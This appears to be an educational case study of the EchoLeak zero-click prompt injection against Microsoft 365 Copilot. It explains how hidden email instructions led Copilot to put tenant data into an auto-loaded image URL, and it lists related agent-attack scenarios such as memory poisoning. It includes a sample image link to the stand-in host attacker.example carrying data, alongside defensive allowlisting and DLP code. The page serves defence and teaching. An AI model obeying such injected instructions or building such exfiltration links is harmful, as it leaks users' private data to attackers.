Case study

EchoLeak — Microsoft 365 Copilot zero-click (CVE-2025-32711)

Disclosed vulnerability · 11 Jun 2025 · 🗺️ Tool-Using Agent

A crafted email's hidden instructions made M365 Copilot exfiltrate tenant data via an auto-rendered image URL — with no user click.

Root cause — why it happened

Copilot reads your company data — emails, files — to answer your questions. An attacker emailed the victim a message with hidden instructions. Later, when Copilot pulled that email into its context to help with a normal request, it followed the hidden instructions and packed private data into a web link for an image. The victim's app automatically loaded that image to show it — and that quiet, automatic load sent the data to the attacker. No click required.
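To make the channel concrete, the sketch below shows what an attacker's server could read from a single auto-loaded image request. Everything in it is illustrative: the markdown-image form, the host `attacker.example`, the parameter name `d`, and the sample text are assumptions for teaching, not the actual EchoLeak payload.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Hypothetical model output: an image whose URL carries data in its query string.
MODEL_OUTPUT = (
    "Here is your summary. "
    "![status](https://attacker.example/pixel.png?d=Q3+budget+is+4.2M)"
)

# Matches inline markdown images and captures the URL.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)\)")


def leaked_by_auto_render(markdown: str) -> list[tuple[str, dict[str, list[str]]]]:
    """Return (host, query parameters) for each image a client would auto-fetch."""
    leaks = []
    for url in MD_IMAGE.findall(markdown):
        parts = urlsplit(url)
        # The query string travels to the host as part of the image request itself.
        leaks.append((parts.hostname or "", parse_qs(parts.query)))
    return leaks


if __name__ == "__main__":
    for host, params in leaked_by_auto_render(MODEL_OUTPUT):
        print(host, params)
```

The point of the sketch is that no response from the server is needed: the request alone delivers the data, which is why rendering is the step to control.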

Risks this case illustrates

Named in the standard (OWASP/ATLAS/NIST) lens.

How it unfolded

[Diagram: agent architecture with zones Untrusted, Agent core, Oversight, and The real world. Components: User, Orchestrator / Agent Loop, LLM, Identity & Permissions, Tool Runtime, Human Approval Gate, External APIs, Business Database, Untrusted Content, Audit Logging, Attacker's email, Attacker server. Flow types: Instructions, Data, Actions, Control / decision, Feedback / logs.]
Setup · Step 1 / 6

An ordinary request to Copilot

The victim asks Copilot something completely normal — to help summarise recent emails or pull together notes. Nothing about the request is suspicious. The attacker's email is already sitting in the mailbox from earlier.

💬 User's request (prompt)
Copilot, can you summarise my recent emails about the Q3 budget and list any action items?

Controls & guardrails — what would have stopped it

The fix that actually closes this: don't let the AI's answer automatically reach out to any web address. If the app only auto-loads images from a short list of trusted places — and treats everything the AI writes as untrusted — then even a tricked Copilot can't smuggle data out through an image link.
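One way to picture that boundary is a filter that runs on the model's answer before the client renders it. This is a minimal sketch, not Microsoft's fix: the allowlist host `images.contoso.example` and the function names are hypothetical, and it only handles inline markdown images.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allowlist; a real deployment would list its own trusted image hosts.
TRUSTED_IMAGE_HOSTS = {"images.contoso.example"}

# Inline markdown image: ![alt](url "optional title")
MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")


def _is_trusted(url: str) -> bool:
    """Allow only https URLs whose host is on the allowlist."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False  # unparseable URLs are treated as untrusted
    return parts.scheme == "https" and parts.hostname in TRUSTED_IMAGE_HOSTS


def strip_untrusted_images(markdown: str) -> str:
    """Replace images from non-allowlisted hosts with inert text."""

    def _replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        if _is_trusted(url):
            return match.group(0)
        return f"[image removed: {alt}]"

    return MD_IMAGE.sub(_replace, markdown)
```

A text filter like this is easy to bypass with other syntaxes (reference-style images, raw HTML), so in practice the same rule would more likely be enforced where the fetch happens, for example in the renderer or a content security policy. An allowlisted host that proxies or redirects arbitrary URLs reopens the channel, so the list needs to stay short.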

Preventive
  • Egress allowlisting & DLP on tool arguments

    Allowlists fight an open-ended channel; legitimate-but-broad destinations (any URL fetch, any email) are hard to constrain without breaking usefulness. Encoding can evade naive DLP.

  • Delimiting / spotlighting of untrusted content

    A trained convention, not enforcement. Determined payloads still break out, especially when content is long or the attack is novel. Combine with action-layer controls.

  • Least-privilege identity & scoped credentials

    Doesn't prevent manipulation — only caps its reach. Hard to get right operationally; over-broad scopes are the common real-world failure.
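The first control in this list, and its stated weakness, can be sketched in a few lines. The example below checks a tool call's string arguments against a host allowlist and a secret pattern. The host `api.contoso.example`, the `sk-` secret format, and the function name are all hypothetical.

```python
import base64
import re
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"api.contoso.example"}           # hypothetical egress allowlist
SECRET = re.compile(r"\bsk-[A-Za-z0-9]{16,}\b")   # hypothetical secret format
URL = re.compile(r"https?://[^\s\"'<>)]+")


def check_tool_args(args: dict[str, str]) -> list[str]:
    """Return policy violations found in a tool call's string arguments."""
    violations = []
    for name, value in args.items():
        for url in URL.findall(value):
            try:
                host = urlsplit(url).hostname
            except ValueError:
                host = None  # unparseable URL: treat as not allowlisted
            if host not in ALLOWED_HOSTS:
                violations.append(f"{name}: host {host} not allowlisted")
        if SECRET.search(value):
            violations.append(f"{name}: secret-like string")
    return violations


if __name__ == "__main__":
    plain = "key sk-ABCDEFGHIJKLMNOP1234"
    encoded = base64.b64encode(plain.encode()).decode()
    print(check_tool_args({"body": plain}))    # flagged by the pattern
    print(check_tool_args({"body": encoded}))  # same secret, not flagged
```

The second call illustrates the caveat above: a pattern match on the raw argument misses the same secret once it is base64-encoded, which is why DLP on arguments works best alongside a destination allowlist rather than instead of one.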

Detective
Corrective
  • Governance: risk assessment, red-teaming & incident response

    Process reduces likelihood and speeds recovery but executes no technical control itself; weak follow-through makes it theatre.

  • Loop/cost circuit-breakers & consistency checks

    Thresholds are blunt — too tight breaks legitimate long tasks, too loose lets damage accrue first. Catches runaway dynamics, not a single well-formed bad decision.
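A loop/cost circuit-breaker of the kind described above can be as small as a counter that the agent loop updates on every step. This is a sketch under assumed names and thresholds (`CircuitBreaker`, `BudgetExceeded`, 20 steps, 1.00 USD), none of which come from the case itself.

```python
from dataclasses import dataclass


class BudgetExceeded(RuntimeError):
    """Raised when the agent loop passes a step or cost threshold."""


@dataclass
class CircuitBreaker:
    max_steps: int = 20         # hypothetical threshold
    max_cost_usd: float = 1.00  # hypothetical threshold
    steps: int = 0
    cost_usd: float = 0.0

    def record(self, step_cost_usd: float) -> None:
        """Count one agent step and stop the loop once a limit is exceeded."""
        self.steps += 1
        self.cost_usd += step_cost_usd
        if self.steps > self.max_steps:
            raise BudgetExceeded(f"step limit {self.max_steps} exceeded")
        if self.cost_usd > self.max_cost_usd:
            raise BudgetExceeded(f"cost limit {self.max_cost_usd} USD exceeded")
```

An attack that completes in one ordinary-looking step, as in this case, never trips either limit, which matches the limitation noted above.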

Lessons

  • Zero-click is possible whenever untrusted content is auto-retrieved into context and model output can trigger an automatic outbound fetch.
  • Treat model output as untrusted: anything it can make the client auto-fetch (images, links, previews) is an exfiltration channel.
  • Input-side injection classifiers (XPIA) lower the probability of a successful injection but never bring it to zero; the durable control is an egress boundary on auto-rendered content.
  • Retrieval over a user's whole mailbox/graph co-locates attacker content with secrets; scope and provenance-tag what enters context.
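The last lesson, scoping and provenance-tagging what enters context, might look like the sketch below. The tenant domain `contoso.example`, the `RetrievedItem` type, and the function names are hypothetical, and the origin is derived from a sender address only for illustration.

```python
from dataclasses import dataclass

INTERNAL_DOMAINS = {"contoso.example"}  # hypothetical tenant domain


@dataclass(frozen=True)
class RetrievedItem:
    text: str
    sender: str  # e.g. "alice@contoso.example"


def provenance(item: RetrievedItem) -> str:
    """Label an item 'internal' or 'external' from its sender domain."""
    domain = item.sender.rsplit("@", 1)[-1].lower()
    return "internal" if domain in INTERNAL_DOMAINS else "external"


def scope_context(
    items: list[RetrievedItem], allow_external: bool = False
) -> list[tuple[str, str]]:
    """Return (origin, text) pairs, dropping external items unless allowed."""
    scoped = []
    for item in items:
        origin = provenance(item)
        if origin == "external" and not allow_external:
            continue
        scoped.append((origin, item.text))
    return scoped
```

Sender headers can be spoofed, so a real system would need to take provenance from authenticated metadata. The label is also only useful if later stages act on it, for example by refusing to auto-render output produced while external content was in context.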

Practise the risk class — related scenarios

📧The Email That Gave Orders

A support email hides instructions — and the assistant obeys them

🕵️Lies in the Loop

A poisoned issue makes the agent lie to the human who approves its actions

👂Overheard Through the Cache

A speed optimisation becomes a cross-tenant listening device

🪟Stealing the Model

Two doors to the same secret: reconstruct the model through its API, or just walk off with the weight file

🪤The Bug Report That Ran Code

A fake Sentry error report hijacks a developer's coding agent into running a shell command

📼The Compromised Flight Recorder

The forensic record is itself the attack surface — an agent's log is poisoned, then quietly rewritten

👁️The Invisible Webpage Command

A shopping page tells the agent to do something the user never asked for

🧠The Memory That Wouldn't Die

A single poisoned document plants a standing instruction that survives every reset

🖼️The Picture That Whispered

A screenshot that's harmless at full size becomes an order once the system shrinks it

🎫The Stolen Session

An attacker captures the agent's bearer token — and inherits its authority

🥸The Uninvited Agent

A forged peer registers on the agent directory — and the planner enlists it

🛡️The Watcher Watched

The eval gate that was supposed to catch the agent is itself the thing being attacked

🪪The Worker Who Spoke for the Boss

A poisoned web page hijacks a research agent — and the planner acts on its behalf

🖼️Zero-Click Leak by Picture

An inbox summary quietly ships a secret to an attacker's server

AI RiskAtlas is an educational model of how GenAI & agentic systems work and fail. Architectures and payloads are illustrative and simplified for learning — not operational guidance. Real-world cases are summarised from public reporting.

Sources & further reading · Built by Shi Yuan